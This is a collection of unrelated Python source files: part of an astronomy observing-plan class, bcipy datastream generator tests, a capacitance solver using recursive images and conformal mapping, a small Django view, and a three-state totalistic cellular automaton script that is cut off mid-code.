paths = sv.get_images(position=self.configs[config_name]['coordinates'],
survey=[survey],
coordinates='J2000',
width=size,
height=size,
grid=True,
gridlabels=True,
pixels=str(pixels))
image = paths[0][0].data
wcs = WCS(paths[0][0].header)
fig, ax = implot(image,wcs=wcs,cmap='gray',**implot_kwargs)
if show_aperture:
if self.configs[config_name].keys() >= {'slit_width','slit_length','PA'}:
slit = SkyRectangularAperture(self.configs[config_name]['coordinates'],
w=self.configs[config_name]['slit_width'],
h=self.configs[config_name]['slit_length'],
theta=self.configs[config_name]['PA']+90*u.deg)
slit.to_pixel(wcs).plot(color='r',lw=3)
elif self.configs[config_name].keys() >= {'fiber_radius'}:
fiber = SkyCircularAperture(self.configs[config_name]['coordinates'],
r=self.configs[config_name]['fiber_radius'])
fiber.to_pixel(wcs).plot(color='r',lw=3)
else:
                raise KeyError('''show_aperture set to True, but this configuration does not have 'slit_width','slit_length', and 'PA' set, which are needed for slit display, or 'fiber_radius' set, for circular aperture.''')
return fig, ax
def add_custom_image(self,config_name,image_name,image,wcs=None):
'''
Add a custom image of your target. Allows for your image to be added to the observing plan along with, e.g., retrieved DSS imaging.
Parameters
----------
config_name: str or list
configuration for which this image should apply. Can be a single configuration string, a list of configuration strings, or 'all'.
image_name: str
a name for the image (for later plotting and access).
image: array_like
the array containing the image
wcs: astropy.WCS, optional (default None)
a wcs object defining the coordinates of the image. This must be provided for some functionality, like overplotting slits/apertures.
'''
self.configs[config_name]['user_images'] = {}
self.configs[config_name]['user_images'][image_name] = {}
self.configs[config_name]['user_images'][image_name]['image'] = image
self.configs[config_name]['user_images'][image_name]['wcs'] = wcs
def show_custom_image(self,config_name,image_name,show_aperture=True,**implot_kwargs):
'''
Display the custom image provided by user. If possible, show aperture (slit/fiber) over it.
'''
image = self.configs[config_name]['user_images'][image_name]['image']
wcs = self.configs[config_name]['user_images'][image_name]['wcs']
fig, ax = implot(image,wcs=wcs,cmap='gray',**implot_kwargs)
if show_aperture:
if self.configs[config_name].keys() >= {'slit_width','slit_length','PA'}:
slit = SkyRectangularAperture(self.configs[config_name]['coordinates'],
w=self.configs[config_name]['slit_width'],
h=self.configs[config_name]['slit_length'],
theta=self.configs[config_name]['PA'])
slit.to_pixel(wcs).plot(color='r',lw=3)
elif self.configs[config_name].keys() >= {'fiber_radius'}:
fiber = SkyCircularAperture(self.configs[config_name]['coordinates'],
r=self.configs[config_name]['fiber_radius'])
fiber.to_pixel(wcs).plot(color='r',lw=3)
else:
                raise KeyError('''show_aperture set to True, but this configuration does not have 'slit_width','slit_length', and 'PA' set, which are needed for slit display, or 'fiber_radius' set, for circular aperture.''')
return fig, ax
def list_configurations(self):
df = pd.DataFrame.from_dict(self.configs,orient='index')
        df['coordinates'] = [i.to_string() if isinstance(i,SkyCoord) else np.nan for i in df['coordinates']]
if 'offset star' in df.columns:
df['offset star'] = [i.to_string() if isinstance(i,SkyCoord) else np.nan for i in df['offset star']]
if 'user_images' in df.columns:
df['user_images'] = ['Y' if isinstance(i,dict) else np.nan for i in df['user_images']]
df.index.name = 'configurations'
df = df.replace({np.nan: '---'})
return df
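    # Example usage of Target (illustrative sketch; coordinates and configuration
    # values are made up, and the module is assumed to be imported as part of its
    # package so the relative ``.imaging`` import resolves):
    #
    #     from astropy import units as u
    #
    #     tgt = Target('J1000+0200', parse_name=False,
    #                  coordinates='10:00:00 +02:00:00',
    #                  coord_units=(u.hourangle, u.deg))
    #     tgt.add_configuration('slit1', obstype='spectroscopy',
    #                           slit_width=1.0 * u.arcsec, slit_length=10 * u.arcsec,
    #                           PA=45 * u.deg)
    #     tgt.add_offset_star('10:00:05 +02:00:30', coord_units=(u.hourangle, u.deg))
    #     print(tgt.list_configurations())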
def nudge_configuration(self,config_name,arcsec_east,arcsec_north):
'''
Nudge the coordinates of a configuration east or north in arcsec
for better alignment.
Parameters
----------
config_name: str
name of configuration to nudge
arcsec_east: float
amount to nudge east (west is negative) in arcsec
arcsec_north: float
amount to nudge north (south is negative) in arcsec
'''
        new_coordinate = self.configs[config_name]['coordinates'].directional_offset_by(0*u.deg,arcsec_north*u.arcsec)
        new_coordinate = new_coordinate.directional_offset_by(90*u.deg,arcsec_east*u.arcsec)
self.configs[config_name]['coordinates'] = new_coordinate
@property
def configurations(self):
return self.list_configurations() |
py | 1a4fc4e3003a83aba98096c11cffb5bbcac701ee | # pylint: disable=too-few-public-methods,no-self-use
"""Tests for datastream generator module"""
from builtins import next
import unittest
import pytest
from past.builtins import map, range
from mock import mock_open, patch
from bcipy.acquisition.datastream.generator import random_data, file_data
from bcipy.acquisition.util import mock_data
class CustomEncoder():
"""Encodes data by prefixing with the count."""
def __init__(self):
super(CustomEncoder, self).__init__()
self.counter = 0
def encode(self, data):
"""Encode the data."""
self.counter += 1
return (self.counter, data)
class TestGenerator(unittest.TestCase):
"""Tests for Generator"""
def test_random_generator(self):
"""Test default parameters for random generator"""
gen = random_data()
data = [next(gen) for _ in range(100)]
self.assertEqual(len(data), 100)
def test_random_high_low_values(self):
"""Random generator should allow user to set value ranges."""
channel_count = 10
low = -100
high = 100
gen = random_data(low=-100, high=100,
channel_count=channel_count)
data = [next(gen) for _ in range(100)]
self.assertEqual(len(data), 100)
for record in data:
self.assertEqual(len(record), channel_count)
for value in record:
self.assertTrue(low <= value <= high)
def test_random_with_custom_encoder(self):
"""Random generator should allow a custom encoder."""
channel_count = 10
gen = random_data(encoder=CustomEncoder(),
channel_count=channel_count)
data = [next(gen) for _ in range(100)]
self.assertEqual(len(data), 100)
for _count, record in data:
self.assertEqual(len(record), channel_count)
self.assertEqual(data[0][0], 1)
self.assertEqual(data[99][0], 100)
def test_file_generator(self):
"""Should stream data from a file."""
row_count = 100
header = ['col1,col2,col3']
data = list(mock_data(row_count, len(header)))
rows = map(lambda x: ','.join(map(str, x)), data)
test_data = '\n'.join(header + rows)
with patch('bcipy.acquisition.datastream.generator.open',
mock_open(read_data=test_data), create=True):
gen = file_data(filename='foo', header_row=1)
generated_data = [next(gen) for _ in range(row_count)]
for i, row in enumerate(generated_data):
self.assertEqual(row, data[i])
def test_file_generator_end(self):
"""Should throw an exception when all data has been consumed"""
row_count = 10
header = ['col1,col2,col3']
data = list(mock_data(row_count, len(header)))
rows = map(lambda x: ','.join(map(str, x)), data)
test_data = '\n'.join(header + rows)
with patch('bcipy.acquisition.datastream.generator.open',
mock_open(read_data=test_data), create=True):
gen = file_data(filename='foo', header_row=1)
# exhaust the generator
for _ in range(row_count):
next(gen)
with pytest.raises(StopIteration):
data.append(next(gen))
def test_file_with_custom_encoder(self):
"""Should allow a custom encoder"""
col_count = 3
row_count = 100
header = ['col1,col2,col3']
data = [[float(cnum + rnum) for cnum in range(col_count)]
for rnum in range(row_count)]
rows = map(lambda x: ','.join(map(str, x)), data)
test_data = '\n'.join(header + rows)
with patch('bcipy.acquisition.datastream.generator.open',
mock_open(read_data=test_data), create=True):
gen = file_data(
filename='foo', header_row=1, encoder=CustomEncoder())
generated_data = [next(gen) for _ in range(row_count)]
for _count, record in generated_data:
self.assertEqual(len(record), col_count)
self.assertEqual(generated_data[0][0], 1)
self.assertEqual(generated_data[99][0], 100)
|
py | 1a4fc5763cea3c91aa138934d88a908f3f68721c | """
pair_conformal.py
====================================
Module for calculating :math:`C_2` using linear algebra,
based on components generated by the method of recursive images
using conformal mapping to obtain :math:`V_{2\infty}`
"""
import scipy
import scipy.special
import numpy as np
import numpy.linalg
from infinite_conformal import fF
eps0= 8.854187817*10**-12
############### old code
'''
def fF(phi,k,accuracy_limit):
"""
Calculates the inverses of the incomplete elliptic integral of the first kind
for a complex argument phi. This function uses Jacobis form (phi) rather than the trigonometric form.
uses scipy.integrate.quad for intergration
scipy.special.ellipkinc(phi, k*k) could have been used if phi was a real number
Parameters
----------
phi : complex number
k : real number
accuracy_limit : limit for accuracy in quad
Returns
-------
complex number
value of incomplete integral
"""
outreal=scipy.integrate.quad(lambda x: fFargRe(k,phi,x), 0, 1,eps_r_of_layersel=accuracy_limit)
outimag=scipy.integrate.quad(lambda x: fFargIm(k,phi,x), 0, 1,eps_r_of_layersel=accuracy_limit)
return (outreal[0]+1j*outimag[0])*phi
def fFargRe(k,phi, x):
"""Real part of the argument for the integral in fF()
"""
theta=phi*x
return (1/np.sqrt(1-k*k*np.sin(theta)**2)).real
def fFargIm(k,phi, x):
"""Imaginary part of the argument for the integral in fF()
"""
theta=phi*x
return (1/np.sqrt(1-k*k*np.sin(theta)**2)).imag'''
def fdtDdz(a):
"""Function for calculating :math:`\\frac{dt}{dz}` in order to calculate the electric field in x and y direction.
    Note that this function is distinct from the one in infinite_conformal.py
"""
return 2/a
def fdwDdt(k,t):
"""Function for calculating :math:`\\frac{dw}{dz}` in order to calculate the electric field in x and y direction.
"""
out = 1/np.sqrt( (1-t**2)*(1-t**2*k**2) )
    # because of the sqrt, there are two possible solutions, need to make sure we select the right one
if out.imag>0:
return out
return -out
def fdwDdz(k,t,a):
"""Function for calculating :math:`\\frac{dt}{dz}` in order to calculate the electric field in x and y direction.
"""
return fdwDdt(k,t)*fdtDdz(a)
class single_recursive_images:
"""
A class that houses the potential, capacitance and electric fields from the method of recursive images.
The values obtained are unphysical, as the potential at the electrodes is not constant.
Parameters
----------
    a : float
        together with b defines the electrode geometry; the cover fraction of the electrodes is eta = b/(a+b)
    b : float
        together with a defines the electrode geometry; the cover fraction of the electrodes is eta = b/(a+b)
interface_of_electrodes : int
interface for the electrodes
thickness_of_layers : list of floats
thicknesses of the layers, this list will be 2 shorter than eps_x_of_layers and eps_y_of_layers, as the outermost layers have no defined thickness, but are infinite
eps_x_of_layers : list of floats
in-plane dielectric constant of the layers
eps_y_of_layers : list of floats
out-of-plane dielectric constant of the layers
max_reflections : int, optional
        maximum number of reflections to consider, defaults to 8
accuracy_limit : float, optional
        reflections with amplitude less than accuracy_limit are ignored, defaults to 10**-7
"""
_V_dicts=dict()#_V_dicts[k][y][x]=V_{I,inf}(x,y)
def __init__(self,a,b,interface_of_electrodes,thickness_of_layers,eps_x_of_layers,eps_y_of_layers,max_reflections=8,accuracy_limit=10**-7):
self.b=b
self.a=a
self.eta=b/(a+b)
self.interface_of_electrodes=interface_of_electrodes
self.thickness_of_layers=thickness_of_layers
# calculate the y-coordinate of each interface
self.y_of_interfaces=[0]
for T in thickness_of_layers:
self.y_of_interfaces.append(self.y_of_interfaces[-1]+T)
self.eps_x_of_layers=eps_x_of_layers
self.eps_y_of_layers=eps_y_of_layers
self.number_of_layers=len(self.eps_y_of_layers)
# calculate the reflection coefficients for each interface
self.r_pos_dir=[] # reflection coefficients for potential going in positive direction
self.r_neg_dir=[] # reflection coefficients for potential going in negative direction
self.t_pos_dir=[] # transmission coefficients for potential going in positive direction
self.t_neg_dir=[] # transmission coefficients for potential going in negative direction
for i in range(self.number_of_layers-1):
eps1=np.sqrt(self.eps_y_of_layers[i]*self.eps_x_of_layers[i])
eps2=np.sqrt(self.eps_y_of_layers[i+1]*self.eps_x_of_layers[i+1])
self.r_pos_dir.append((eps1-eps2)/(eps1+eps2))
self.t_pos_dir.append(self.r_pos_dir[-1]+1)
self.r_neg_dir.append(-self.r_pos_dir[-1])
self.t_neg_dir.append(self.r_neg_dir[-1]+1)
# calculate eps_r of all layers
self.eps_r_of_layers=[]
for i in range(self.number_of_layers):
if self.eps_y_of_layers[i]>0:
self.eps_r_of_layers.append((self.eps_x_of_layers[i]/self.eps_y_of_layers[i])**0.5)
else:
self.eps_r_of_layers.append(1)
# calculate k for the electrodes
# k is the argument for the eliptical integrals
self.max_reflections=max_reflections
self.accuracy_limit=accuracy_limit
self.k=(1-self.eta)/(1+self.eta) #external
self.Kk= scipy.special.ellipk(float(self.k**2))
self.Kpk= scipy.special.ellipk(1-float(self.k**2))
if not self.k in self._V_dicts:
self._V_dicts[self.k]=dict()
self.Vdict=self._V_dicts[self.k] #Vdict[y][x]=V_{I,inf}(x,y)
self.tree=[]
def get_tree(self):
if len(self.tree)==0:
self.make_tree()
return self.tree
def make_tree(self):
"""
Function for building the tree\n
The tree consists of a list of lists where
the main list iterates over the layers and
the sublists contain a series of cases defined as:\n
[dist prior, direction, amplitude]\n
dist prior: the distance traveled to get to the current layer\n
        direction: the direction of the potential through the layer (reflection switches the direction)\n
amplitude: multiplication of all the reflection and transmission coefficients so far\n
        The cases are calculated iteratively, starting with the initial projected fields
(with positive direction in the layer above the electrodes, and negative direction below them)\n
"""
''' tree will contain the full tree, and the reflections are added iteratively
temp_tree_1 and temp_tree_2 are used to keep track of what fields will be
        addressed in the next iteration'''
tree=[]
temp_tree_2=[]
for layer in range(self.number_of_layers):
tree.append([])
temp_tree_2.append([])
#[dist prior,direction,amplitude,displacementx]
''' add initial fields'''
temp_tree_2[self.interface_of_electrodes].append([0,-1,1])
tree[self.interface_of_electrodes].append([0,-1,1])
temp_tree_2[self.interface_of_electrodes+1].append([0,1,1])
tree[self.interface_of_electrodes+1].append([0,1,1])
for step in range(self.max_reflections):
temp_tree_1=temp_tree_2
temp_tree_2=[]
for layer in range(self.number_of_layers):
temp_tree_2.append([])
''' at this point
temp_tree_1 contains the fields that should generate additional reflections
temp_tree_2 is empty, and cases for the next iteration are added here'''
for layer in range(self.number_of_layers-2): #layer-2 because the outermost layers have infinite thickness and cannot generate reflections
for case in temp_tree_1[layer+1]:
dist_prior=case[0]
dist_add=self.thickness_of_layers[layer]*self.eps_r_of_layers[layer+1]
direction=case[1]
amplitude=case[2]
if abs(amplitude*np.exp(-np.pi*(dist_prior+dist_add)))>self.accuracy_limit:
if direction==1:
temp_tree_2[layer+1].append([dist_prior+dist_add,-direction,amplitude*self.r_pos_dir[layer+1]])
temp_tree_2[layer+2].append([dist_prior+dist_add,direction,amplitude*self.t_pos_dir[layer+1]])
tree[layer+1].append(temp_tree_2[layer+1][-1]) # add to actual tree
tree[layer+2].append(temp_tree_2[layer+2][-1]) # add to actual tree
if direction==-1:
temp_tree_2[layer+1].append([dist_prior+dist_add,-direction,amplitude*self.r_neg_dir[layer]])
temp_tree_2[layer].append([dist_prior+dist_add,direction,amplitude*self.t_neg_dir[layer]])
tree[layer+1].append(temp_tree_2[layer+1][-1]) # add to actual tree
tree[layer].append(temp_tree_2[layer][-1]) # add to actual tree
self.tree=tree
def get_C(self):
"""
Returns
-------
float
capacitace
"""
eps_m_below=self.eps_y_of_layers[self.interface_of_electrodes]*self.eps_r_of_layers[self.interface_of_electrodes]
eps_m_above=self.eps_y_of_layers[self.interface_of_electrodes+1]*self.eps_r_of_layers[self.interface_of_electrodes+1]
return (eps_m_below+eps_m_above)*self.Kpk/self.Kk*eps0/2
def get_C_int_Ex(self):
"""
Function for calculating the capacitance by integrating :math:`\\varepsilon_xE_x` at :math:`x=0`.\n
Used for testing, as it should give same output as get_C().\n
For all practical applications get_C() should be used instead\n
Returns
-------
float
capacitace
"""
if self.eps_x_of_layers[0]>0:
G,error=scipy.integrate.quad(lambda y: self.get_Ex(0,y), -80, 0)
C = G*self.eps_x_of_layers[0]*eps0
else:
C = 0
for i in range(self.number_of_layers-2):
if self.eps_x_of_layers[i+1]>0:
G,error=scipy.integrate.quad(lambda y: self.get_Ex(0,y), self.y_of_interfaces[i], self.y_of_interfaces[i+1])
C+= G*self.eps_x_of_layers[i+1]*eps0
if self.eps_x_of_layers[-1]>0:
G,error=scipy.integrate.quad(lambda y: self.get_Ex(0,y), self.y_of_interfaces[-1], 80)
C+= G*self.eps_x_of_layers[-1]*eps0
return -C
def get_V_Ex_Ey(self,x,y,get_V=1,get_Ex=1,get_Ey=1): # accepts 'x' as a list, but 'y' must be single value
"""
        Function for calculating the potential and electric fields at coordinates (x,y)
Parameters
----------
x : float or list of floats
x-coordiate(s)
y : float
y-coordiate
get_V : bool, optional
V is only calculated if this flag is set to True, default: True
get_Ex : bool, optional
Ex is only calculated if this flag is set to True, default: True
get_Ey : bool, optional
Ey is only calculated if this flag is set to True, default: True
Returns
-------
list of float for V, Ex, Ey
"""
tree=self.get_tree()
#print('donetree',time.time()-t0)
x=np.array(x)
x=np.atleast_1d(x)
V=np.zeros(x.size)
Ex=np.zeros(x.size)
Ey=np.zeros(x.size)
layer=0
while layer<len(self.y_of_interfaces) and self.y_of_interfaces[layer]<=y:
layer+=1
if self.eps_y_of_layers[layer]==0:
return 0,0,0
#nn=[]
for case in tree[layer]:
#dist_prior=#[dist prior,direction]
dist_prior=case[0]
direction=case[1]
amplitude=case[2]
if amplitude==0: continue
if direction==1:
#interfaces[layer] is the interface below the layer
Y=dist_prior+self.eps_r_of_layers[layer]*(y-self.y_of_interfaces[layer-1])
else: #direction==-1
Y=dist_prior-self.eps_r_of_layers[layer]*(y-self.y_of_interfaces[layer])
for i,XX in enumerate(x):
if get_Ex or get_Ey:
                    z=abs(XX)+1j*Y # position on the z-plane
                    t=z*2/self.a # position on the t-plane
dwDdz=fdwDdz(self.k,t,self.a) # :math:`\\frac{dw}{dz}`
if get_Ex:
Ex[i]+=1/self.Kk*dwDdz.real*amplitude
if get_Ey:
Ey[i]+=1/self.Kk*dwDdz.imag*direction*amplitude*self.eps_r_of_layers[layer]
if get_V:
Yp=abs(Y)
if not Yp in self.Vdict:
self.Vdict[Yp]={}
if not XX in self.Vdict[Yp]:
                        z=XX+1j*Yp # position on the z-plane
                        t=z*2/self.a # position on the t-plane
F=fF(np.arcsin(t),self.k,self.accuracy_limit/amplitude) # heavy lifting for transformation to w-plane
self.Vdict[Yp][XX]=((1/self.Kk)*F.real)
V[i]+=self.Vdict[Yp][XX]*amplitude
####################################
return V/2, Ex/2, Ey/2
def get_V(self,x,y):
"""
calls get_V_Ex_Ey() to calculate V
"""
V,Ex,Ey=self.get_V_Ex_Ey(x,y,1,0,0)
return V
def get_Ex(self,x,y):
"""
calls get_V_Ex_Ey() to calculate Ex
"""
V,Ex,Ey=self.get_V_Ex_Ey(x,y,0,1,0)
return Ex
def get_Ey(self,x,y):
"""
calls get_V_Ex_Ey() to calculate Ey
"""
V,Ex,Ey=self.get_V_Ex_Ey(x,y,0,0,1)
return Ey
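# Example usage (sketch; the numbers are illustrative, and the module must be able to
# import its sibling infinite_conformal for fF): a single component for an electrode
# pair at interface 0, with vacuum below and an eps = 3 half-space above.
#
#     srec = single_recursive_images(a=1.5, b=0.5, interface_of_electrodes=0,
#                                    thickness_of_layers=[],
#                                    eps_x_of_layers=[1.0, 3.0],
#                                    eps_y_of_layers=[1.0, 3.0])
#     print(srec.get_C())        # capacitance of this single (unphysical) component
#     print(srec.get_V(0.5, 0.1))  # potential at (x, y) = (0.5, 0.1)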
class multiple_recursive_images:
"""
A class generates and houses instances of the class single_recursive_images and uses a linear combination of these
    to approximate physical values for the capacitance, potential, and electric fields of an electrode pair.
Parameters
----------
etas : list of float
        cover fraction of the electrode(s); must be a list of the same length as there are interfaces, i.e. 1 shorter than eps_x_of_layers
        each value must satisfy 0 <= eta <= 1. 0 indicates that no electrode exists at the corresponding interface
thickness_of_layers : list of floats
thicknesses of the layers, this list will be 2 shorter than eps_x_of_layers and eps_y_of_layers, as the outermost layers have no defined thickness, but are infinite
eps_x_of_layers : list of floats
in-plane dielectric constant of the layers
eps_y_of_layers : list of floats
out-of-plane dielectric constant of the layers
LAcomp: int or list of ints, optional
the number of components used for each set of electrodes. If list, the list must be the same length as etas, and have a number larger than one for each nonzero value in etas.
        If not a list, the same value will be used for all electrodes. Defaults to 8
max_reflections : int, optional
        maximum number of reflections to consider, defaults to 8
voltages : list of floats or None, optional
If a list of floats is provided, the voltage at each set of electrodes will be set to +/- the corresponding value in the list. the list must have the same length as etas.
If None, the potential at each set of electrodes with a cover fraction less than 1 is set to +/-0.5, for a total difference of 1V. The potential at electrodes with a cover fraction of 1 is set to 0, as this is assumed to be grounded.
        Defaults to None. NB! the calculated capacitance assumes a potential of +/-0.5 at the electrodes; if a different value is used, the calculated capacitance will reflect the charge at the electrodes rather than the capacitance!
periods : list of floats or none, optional
list of the same length as there are interfaces that declares the period for electrodes on that interface.
        If None, all electrodes have a period of one. Electrodes extend from period*(1-eta)/2 to period*(1+eta)/2 in this class.
Typical use is when approximating an infinite grounded electrode. The infinite electrode is then set to have a period > 1.
Defaults to None
accuracy_limit : float, optional
        reflections with amplitude less than accuracy_limit are ignored, defaults to 10**-10
"""
def __init__(self,etas,thickness_of_layers,eps_x_of_layers,eps_y_of_layers,LAcomp=8,max_reflections=8, voltages = None,periods=None,accuracy_limit=10**-10):
# eta = vector of floats, t = vector of floats, eps_x_of_layers = vector of floats, eps_y_of_layers = vector of floats, LAcomp = int, max_reflections = int,
# eps_x_of_layers and eps_y_of_layers refer to materials, the length must therefore be at least 2
# eta refers to interfaces, the length must therefore be at least 1
# t refers to the thicknes of layers of finite thickness. This vector may have 0 elements.
# LAcomp must be an int, or a vector of same length as eta
# voltages must be 'None' or a vector of same length as eta, and is uset to set voltage ratios if multiple sets of electrodes are used
self.accuracy_limit=accuracy_limit
self.etas=etas
if periods==None:
self.periods=np.ones(len(self.etas))
else:
self.periods=periods
self.thickness_of_layers=thickness_of_layers
self.eps_x_of_layers=eps_x_of_layers
self.eps_y_of_layers=eps_y_of_layers
self.LAcomp=LAcomp
self.max_reflections=max_reflections
self.voltages=voltages
if self.voltages == None: # create voltages vector, all electrode sets should have V=0.5, unless they are continious, then they should have 0. If no electrodes are present at the interface, then the voltage is also set to 0
self.voltages = []
for eta in self.etas:
if eta == 0:
self.voltages.append(0)
elif eta == 1:
self.voltages.append(0)
else:
self.voltages.append(0.5)
# declare the step size for for eta in each set of electrodes
self.electrodesteps=[]
if isinstance(LAcomp, (int,)):
for eta in self.etas:
self.electrodesteps.append(eta/self.LAcomp)
else:
for eta, LA in zip(self.etas, self.LAcomp):
if LA>0:
self.electrodesteps.append(eta/LA)
else:
self.electrodesteps.append(0)
        # calculate the relevant locations, a's and b's for the linear algebra approach
        # for each case, the a and b are changed so that the outermost part of the electrode remains in place
self.xpoints=[] #<- list of list of points of interest
self.xpointVs=[]
self.caseAs=[] #<- list of lists of a of individual cases
self.caseBs=[] #<- list of lists of b of individual cases
for eta, step, V,period in zip(self.etas, self.electrodesteps,self.voltages,self.periods):
self.xpoints.append([])
self.caseAs.append([])
self.caseBs.append([])
l=step*0.5
while l<eta and l<1-step: # the second condition prevents the last point from being added if the electrodes are continuous.
self.xpoints[-1].append((-l+0.5+eta/2)*period)
self.caseBs[-1].append((l+step*0.5)*period)
self.caseAs[-1].append((1+eta-2*l-step)*period)
self.xpointVs.append(V)
l+=step
self.C=-1
def get_C(self):
"""
Function for calculating the total capacitance using linear algebra.
To do this it first builds the different single_recursive_images objects,
then uses them to calculate the potential at self.xpoints and solves a linear system for the weights.
Finally, the capacitance is calculated as sum(weights*single_recursive_images.get_C())
Returns
-------
float
capacitance
"""
if self.C==-1:
self.Cs=[]
self.single=[]
self.Vs=[]
# electrodes may exist on multiple interfaces, so iterate
for interface, _ in enumerate(self.caseAs):
for a,b in zip(self.caseAs[interface],self.caseBs[interface]):
self.single.append(single_recursive_images(a,b,interface,self.thickness_of_layers,self.eps_x_of_layers,self.eps_y_of_layers,self.max_reflections,self.accuracy_limit))
self.Vs.append(np.array([]))
# calculate the potential for the last case at all designated locations
# iterate over designated locations: first iterate over layers
y=0 # need y to keep track of location as we iterate over layers
for interfaceOfXpoint, _ in enumerate(self.caseAs):
if len(self.xpoints[interfaceOfXpoint])>0: # only calculate if there are any points
# utilize the fact that get_V supports a list of x coordinates as input to
# calculate all points on this interface by one function call
V=self.single[-1].get_V(self.xpoints[interfaceOfXpoint],y)
# concatenate the potentials at this interface with previous potentials at other interfaces
self.Vs[-1]=np.concatenate((self.Vs[-1], V))
if interfaceOfXpoint<len(self.thickness_of_layers):
# need y to keep track of location as we iterate over layers
y+=self.thickness_of_layers[interfaceOfXpoint]
# get the corresponding capacitance associated with these potentials
self.Cs.append(self.single[-1].get_C())
# solve the linear algebra expression for X: AX=B
A=np.array(self.Vs).transpose()
B=np.array(self.xpointVs)
self.weights=np.linalg.solve(A,B)
# calculate the capacitance
self.C=np.dot(np.array(self.Cs),np.array(self.weights))
return self.C
def get_C_int_Ex(self):
"""
Function for calculating the capacitance by integrating :math:`\\varepsilon_xE_x` at :math:`x=0`.\n
Used for testing, as it should give same output as get_C().\n
For all practical applications get_C() should be used instead\n
Returns
-------
float
capacitance
"""
if self.C==-1:
self.get_C()
Cs=[]
for case in self.single:
Cs.append(case.get_C_int_Ex())
C=np.dot(np.array(Cs),np.array(self.weights))
return C
def get_V_Ex_Ey(self,x,y,get_V=1,get_Ex=1,get_Ey=1):
"""
Function for calculating the potential and electric fields at coordinates (x,y)
Parameters
----------
x : float or list of floats
x-coordinate(s)
y : float
y-coordinate
get_V : bool, optional
V is only calculated if this flag is set to True, default: True
get_Ex : bool, optional
Ex is only calculated if this flag is set to True, default: True
get_Ey : bool, optional
Ey is only calculated if this flag is set to True, default: True
Returns
-------
list of float for V, Ex, Ey
"""
if self.C==-1:
self.get_C()
V=0
Ex=0
Ey=0
for case, component in zip(self.single, self.weights):
Vi,Exi,Eyi=case.get_V_Ex_Ey(x,y,get_V,get_Ex,get_Ey)
V+=Vi*component
#print(Vi, component)
Ex+=Exi*component
Ey+=Eyi*component
return(V,Ex,Ey)
def get_V(self,x,y):
"""
calls get_V_Ex_Ey() to calculate V
"""
V,Ex,Ey=self.get_V_Ex_Ey(x,y,1,0,0)
return V
def get_Ex(self,x,y):
"""
calls get_V_Ex_Ey() to calculate Ex
"""
V,Ex,Ey=self.get_V_Ex_Ey(x,y,0,1,0)
return Ex
def get_Ey(self,x,y):
"""
calls get_V_Ex_Ey() to calculate Ey
"""
V,Ex,Ey=self.get_V_Ex_Ey(x,y,0,0,1)
return Ey
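# --- Added illustrative sketch (not part of the original module) ---
# The weights solve in get_C() boils down to A x = b, where A[i, j] is the potential that
# basis case j produces at control point i and b holds the target electrode potentials.
# The numbers below are made up purely to show the mechanics of that step.
if __name__ == "__main__":
    import numpy as np  # re-imported locally so the sketch is self-contained
    A = np.array([[1.0, 0.3],
                  [0.3, 1.0]])        # potentials of two basis cases at two control points
    b = np.array([0.5, 0.5])          # desired potential (+0.5 V) at both control points
    weights = np.linalg.solve(A, b)   # same solve as in get_C()
    Cs = np.array([2.1, 1.7])         # per-case capacitances (illustrative values only)
    print("toy total capacitance:", np.dot(Cs, weights))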
|
py | 1a4fc5de101873b7b8287a5837ff9de621cdb8ed | from django.shortcuts import render
import logging
from django.contrib.auth.decorators import login_required
# Create your views here.
logger = logging.getLogger('django')
@login_required
def home(request):
# logger.warning('request is processing')
return render(request, 'core/home.html', {})
|
py | 1a4fc5ffa88e4a2cdea59caf5c1d468b588a4baa | # Author:
# Adapted from code in Think Complexity, 2nd Edition, by by Allen Downey
import sys
import numpy as np
rule_width = 7
def make_table(rule_num):
"""Make the table for a given CA rule.
rule_num: int 0-2186
returns: list of 7 values, each 0, 1, or 2
"""
rule_set = [0] * rule_width
num = rule_num
for i in range(rule_width):
rule_set[i] = num % 3
num = num // 3
rule_set.reverse()
print("number: ", rule_num)
print("rule_set:", rule_set)
return rule_set
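# Added worked example (illustrative): 1635 in base 3 is 2020120, i.e.
# 1635 = 2*729 + 0*243 + 2*81 + 0*27 + 1*9 + 2*3 + 0*1, so make_table(1635) returns
# [2, 0, 2, 0, 1, 2, 0]. With the lookup used in step() below (table[6 - total]),
# index 0 is the next state when the three-cell neighbourhood sums to 6 and index 6
# when it sums to 0.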
class TotalisticCell1D:
"""Represents a 1-D, three-state, totalistic cellular automaton"""
def __init__(self, rule_num, gen_count, m=None):
"""Initializes the CA.
rule_num: integer
gen_count: number of rows (generations)
m: number of columns
Attributes:
table: rule dictionary that maps from triple to next state.
array: the numpy array that contains the data.
next: the index of the next empty row.
"""
self.rule_width = 7
self.table = make_table(rule_num)
self.n = gen_count
self.width = 2 * gen_count + 1 if m is None else m
self.array = np.zeros((gen_count, self.width), dtype=np.int8)
self.next = 0
def start_single(self):
"""Starts with one cell in the middle of the top row."""
self.array[0, self.width // 2] = 1
self.next += 1
def start_random(self):
"""Start with random values in the top row."""
self.array[0] = np.random.random(self.width).round()
self.next += 1
def start_string(self, s):
"""Start with values from a string of 1s and 0s."""
s_len = len(s)
# Check string length
assert s_len <= self.width
padding_len = self.width - s_len
left_padding_len = padding_len // 2
ss = "0" * left_padding_len + s
right_padding_len = self.width - len(ss)
sss = ss + "0" * right_padding_len
self.array[0] = np.array([int(x) for x in sss])
self.next += 1
def loop(self, steps=1):
"""Executes the given number of time steps."""
for i in range(steps):
if i % 1024 == 0:
print("step {} of {}".format(i, self.n))
self.step()
def step(self):
"""Executes one time step by computing the next row of the array."""
a = self.array
i = self.next
window = [1, 1, 1]
row = self.array[i - 1]
correlated_row = np.correlate(row, window, mode="same")
next_row = np.array([self.table[7 - total - 1] for total in correlated_row])
a[i] = next_row
self.next += 1
def print_ca(self, start=0, end=None, fid=None):
"""Prints the CA.
start: index of the first column to be shown
end: index of the last column to be shown
"""
a = self.array[:, start:end]
if fid:
np.savetxt(fid, a, delimiter="", fmt='%1d', )
else:
for row in a:
print(row)
def draw_ca(rule_num, gen_count=32, fid=None, start=None):
"""Makes and prints a 1D, three-state, totalistic CA with a given rule.
rule_num: int rule number
gen_count: number of rows
"""
ca = TotalisticCell1D(rule_num, gen_count)
if start is None:
ca.start_single()
else:
ca.start_string(start)
ca.loop(gen_count - 1)
ca.print_ca(fid=fid)
def write_ca(gen_count=16, start=None):
rule_num = 1635
if start is None:
file_name = "out/ca/{}_{:05d}.txt".format(rule_num, gen_count)
else:
file_name = "out/ca/{}_{:05d}_{}.txt".format(rule_num, gen_count, start)
fid = file_name
draw_ca(rule_num, gen_count, fid, start)
if __name__ == "__main__":
n = int(sys.argv[1])
if len(sys.argv) > 2:
